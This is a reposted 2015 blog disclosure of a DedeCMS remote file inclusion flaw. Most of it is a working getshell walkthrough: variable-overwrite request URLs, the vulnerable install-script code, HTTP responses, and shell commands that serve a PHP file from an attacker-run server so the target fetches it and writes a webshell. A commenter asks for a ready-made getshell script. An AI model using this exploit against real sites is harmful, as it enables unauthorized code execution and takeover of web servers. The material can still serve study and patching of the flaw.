DedeCMS < 5.7-sp1远程文件包含漏洞

Published: 2015-06-29

Remote getshell 
Details:
=======
After the default installation of dedecms
Installation directory
/install/index.php
or
/install/index.php.bak
  
/install/index.php //run iis apache exploit
/install/index.php.bak //run apache exploit
 
 
Code analysis
 
/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
 
#############################################################################
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
 
here $install_demo_name and $insLockfile definition
// echo $install_demo_name;  printf dedev57demo.txt 
 
29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
30 {
31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
32 }
 
 
// echo $install_demo_name; printf aaaa
 
$install_demo_name by variable coverage
 
The same
17 $install_demo_name = 'dedev57demo.txt';
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
 
variable coverage
#############################################################################
 
 
 
  
GETSHELL Step 1 Clear file contents config_update.php
#############################################################################
config_update.php
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
14 $linkHost = 'http://flink.dedecms.com/server_url.php';
 
In order to obtain the webshell need to control $updateHost
So the use of variable coverags cleared config_update.php
 
  
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php
 
index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377 
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }
 
###
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 06:55:23 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: User-Agent
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
  
  <font color="red">[×]</font> 远程获取失败
 ###
 
 
 
 
###After execution file 0 byte ~ho~year~####
2015/06/17  14:55                 0 config_update.php
               1 file              0 byte
 
 
  
GETSHELL Step 2
#############################################################################
Create local HTTP services
  
zise:tmp zise$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 119.253.3.18 netmask 0xffffff00 broadcast  
  
zise:tmp zise$ mkdir "dedecms"
zise:tmp zise$ cd dedecms/
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
zise:dedecms zise$ cd ../
zise:tmp zise$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
  
  
####
http://192.168.204.135/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://119.253.3.18:8000/
 
####
  
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2015 07:11:18 GMT
Server: Apache/2.4.12
X-Powered-By: PHP/5.6.6
Vary: Accept-Encoding,User-Agent
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
  
  <font color="green">[√]</font> 存在(您可以选择安装进行体验)
 
 
index.php.bak
373 else if($step==11)
374 {
375 require_once('../data/admin/config_update.php');
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
377 
378 $sql_content = file_get_contents($rmurl);
379 $fp = fopen($install_demo_name,'w');
380 if(fwrite($fp,$sql_content))  //fwrite websehll
381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
382 else
383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
384 unset($sql_content);
385 fclose($fp);
386 exit();
387 }
  
Attack complete
you webshell
  
http://192.168.204.135/install/hello.php
 
 
 
> zise ^_^
> Security researcher

本文固定链接: https://www.unhonker.com/bug/1759.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年07月06日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: DedeCMS < 5.7-sp1远程文件包含漏洞 | 90' s Blog|关注网络信息安全
关键字:

DedeCMS < 5.7-sp1远程文件包含漏洞:目前有1 条留言

  1. 沙发
    小轩:

    有没有getshell脚本

    2015-07-27 03:43

发表评论

您必须 [ 登录 ] 才能发表留言!